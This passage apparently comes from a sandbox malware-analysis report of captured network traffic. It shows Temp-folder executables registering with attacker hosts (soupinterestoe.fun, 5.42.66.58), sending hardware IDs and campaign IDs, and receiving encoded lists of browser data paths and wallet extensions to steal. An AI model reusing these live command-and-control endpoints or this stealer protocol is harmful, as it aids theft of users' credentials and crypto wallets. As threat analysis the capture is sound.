Dec 27, 2023 17:57:50.907418013 CET	1286	IN	Data Raw: 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 Data Ascii: >...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.add
Dec 27, 2023 17:57:50.907433033 CET	1286	IN	Data Raw: 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 77 6f 72 74 68 79 Data Ascii: mation such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="fG.WDRwoO91
Dec 27, 2023 17:57:50.907445908 CET	1286	IN	Data Raw: 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 Data Ascii: left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">83c31adcbf3268fa</strong></span> <span class="cf-footer-separato
Dec 27, 2023 17:57:50.907458067 CET	144	IN	Data Raw: 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 Data Ascii: </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 27, 2023 17:57:50.907469034 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 27, 2023 17:57:51.117134094 CET	349	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 66 Host: soupinterestoe.fun
Dec 27, 2023 17:57:51.117183924 CET	66	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 6c 65 67 65 6e 64 61 72 79 69 6e 73 74 61 6c 6c 73 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--legendaryinstalls&j=default
Dec 27, 2023 17:57:51.684366941 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=v8uqog5iv8mofo4lpijuht1n5r; expires=Sun, 21-Apr-2024 10:44:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qn5jwrQ3tghirbJIjcVSbej%2BRqsUb%2FT1JHTn4FiMxRv6u4iHjDT08VdlZOP0kd5QFuH39yTR8xWLGz%2FxkCgNEohOpxEPUj8pYUwwbIyImf%2BGNCFr0Fk0TXywnOjFkl%2BiK1%2FnoDE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:57:51.684384108 CET	1286	IN	Data Raw: 64 65 65 39 33 62 36 38 66 61 2d 44 46 57 0d 0a 0d 0a 34 33 63 38 0d 0a 51 46 34 79 32 70 56 70 31 44 68 58 32 44 2f 65 76 75 7a 46 4d 31 6f 6b 36 4b 6c 50 33 38 71 44 77 54 6d 2b 47 4d 2f 57 63 48 38 37 55 7a 6a 36 74 55 6e 30 47 69 48 36 42 66 Data Ascii: dee93b68fa-DFW43c8QF4y2pVp1DhX2D/evuzFM1ok6KlP38qDwTm+GM/WcH87Uzj6tUn0GiH6Bf6KwMg5egTIiW2sr6H7GcpqurNcckp+Evq1S7VcdeIfuN+AtlZ2KeKJb//qoaRBnCLvjX11YH4S+rVJrzVd+B/+nszlE3oGjcdt5eqhpFPceaO0ERQvLl65/QWzUDK7W7/SgaBWP0WCxyayou7jFbMS7/ZQX2B+Evq
Dec 27, 2023 17:57:51.684396982 CET	1286	IN	Data Raw: 6a 53 51 74 58 71 6f 2b 45 5a 6e 6a 6a 76 39 6c 49 61 4c 6e 77 49 2b 72 63 50 73 6c 59 31 76 56 4f 34 32 6f 4f 67 57 6a 56 4d 6a 63 63 6b 74 61 50 68 72 31 54 66 66 4b 57 2f 46 52 63 71 4e 6c 4f 77 39 30 76 34 4e 56 33 34 48 2f 36 65 7a 4f 55 54 Data Ascii: jSQtXqo+EZnjjv9lIaLnwI+rcPslY1vVO42oOgWjVMjccktaPhr1TffKW/FRcqNlOw90v4NV34H/6ezOUTegaN023l6qGYVsx3pvR9dWB+Evq1SakUWtIf/p7M5RMhKeKJb//qo+EZnjqquFJFYHxYuPEIu1s5vVa314KoWThOhM4us6LgpFXZeqq8HREpOhD2mGP0GHf4H/6ezOdWIAbSiW2Ro+W1QJwVxfZQX2B+Eqe5ZN4Yd
Dec 27, 2023 17:57:51.684411049 CET	1286	IN	Data Raw: 36 61 78 55 32 48 53 72 73 68 38 59 4c 54 5a 43 73 50 6b 47 76 56 55 2b 71 46 32 78 32 49 4b 6a 57 54 4e 4d 79 6f 56 43 31 65 71 6a 34 52 6d 65 4f 4f 2f 32 55 68 6f 36 66 41 6a 36 74 7a 36 37 56 54 57 35 53 2f 79 7a 35 75 55 54 65 67 54 49 69 54 Data Ascii: 6axU2HSrsh8YLTZCsPkGvVU+qF2x2IKjWTNMyoVC1eqj4RmeOO/2Uho6fAj6tz67VTW5S/yz5uUTegTIiTLzx4nhGZ447/YLckp+Evq1SfQYd/pasJzW5RE0SIrEIbGj6aJX0n2ovRoVMD1UsPYFuVsxv1i424qhXngI5aNv/+qj4RmeOO2zCl16fhCX0D70ew/6MtSezOUTegSVhULV6qPhGZ44tNt6X2B+Evq1SfQaMrYd5J7
Dec 27, 2023 17:57:51.727459908 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:52.100738049 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=4svb8p7dfinsaje8n4qfrd9vdl; expires=Sun, 21-Apr-2024 10:44:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DcAL2IiPmL1oFd5K%2Bu4Cswq3NLfaSxMArv%2FCg510DnOL%2FcjORxi6SHspfWASvWyUyUYEKPyCUUgR1GWKgz3rbk9AD0N22BLmWFTTPHJIiejRZb9Avw9pJ2oEGUC6loQR5CEQO44%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ae2bd4 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49752	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:51.342286110 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:51.342483044 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:51.880695105 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=hb55n2ohorm5mvopnlv485hmna; expires=Sun, 21-Apr-2024 10:44:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8ykMTNptbteKJesrOJFAShGni7m%2FcKcF6VIl7ib9pqshQ93LZR%2F3nqKUbJSoV9Nf4VFDhaYEy5k4RyCgKl1eIBe8JDUxpr8o%2B0fcm4INtJEeXxaxPwMiyLgox7grSXy3CuzutbY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31ae04a5 Data Raw: Data Ascii:
Dec 27, 2023 17:57:51.880708933 CET	39	IN	Data Raw: 65 39 37 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: e976-DFW15Malformed packet data
Dec 27, 2023 17:57:51.880724907 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	5.42.66.58	80	7320	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:51.971095085 CET	412	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFC Host: 5.42.66.58 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 34 32 45 43 31 46 36 44 30 34 33 34 37 39 32 32 31 31 33 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"0442EC1F6D043479221132------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default4------AAEBAFBGIDHCBFHIECFC--
Dec 27, 2023 17:57:52.998101950 CET	339	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 144 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4d 54 51 33 59 7a 41 79 4e 6a 64 6a 4d 44 63 30 4d 54 68 6c 59 32 4d 35 4f 44 41 31 4e 6d 4a 6c 4d 6d 4e 6d 4d 6a 41 32 4f 44 59 31 59 57 5a 68 4d 44 6c 6c 5a 6a 63 7a 4e 32 46 69 5a 47 4a 6d 4d 44 56 6a 4d 7a 59 34 5a 47 49 33 5a 6d 4e 68 4e 47 4e 6d 59 54 51 33 4e 32 52 6b 5a 6d 4e 6a 66 47 52 76 62 6d 56 38 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: MTQ3YzAyNjdjMDc0MThlY2M5ODA1NmJlMmNmMjA2ODY1YWZhMDllZjczN2FiZGJmMDVjMzY4ZGI3ZmNhNGNmYTQ3N2RkZmNjfGRvbmV8NTE5NTU1NS5maWxlfDF8MXwxfDF8MXwxfDF8MXw=
Dec 27, 2023 17:57:53.024487019 CET	465	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE Host: 5.42.66.58 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="message"browsers------AFIEGCAECGCAEBFHDHIE--
Dec 27, 2023 17:57:53.425595999 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2
Dec 27, 2023 17:57:53.425612926 CET	430	IN	Data Raw: 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c Data Ascii: hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZ
Dec 27, 2023 17:57:53.444170952 CET	464	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH Host: 5.42.66.58 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="message"plugins------GCBGIIECGHCAKECAFBFH--
Dec 27, 2023 17:57:53.836587906 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5412 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 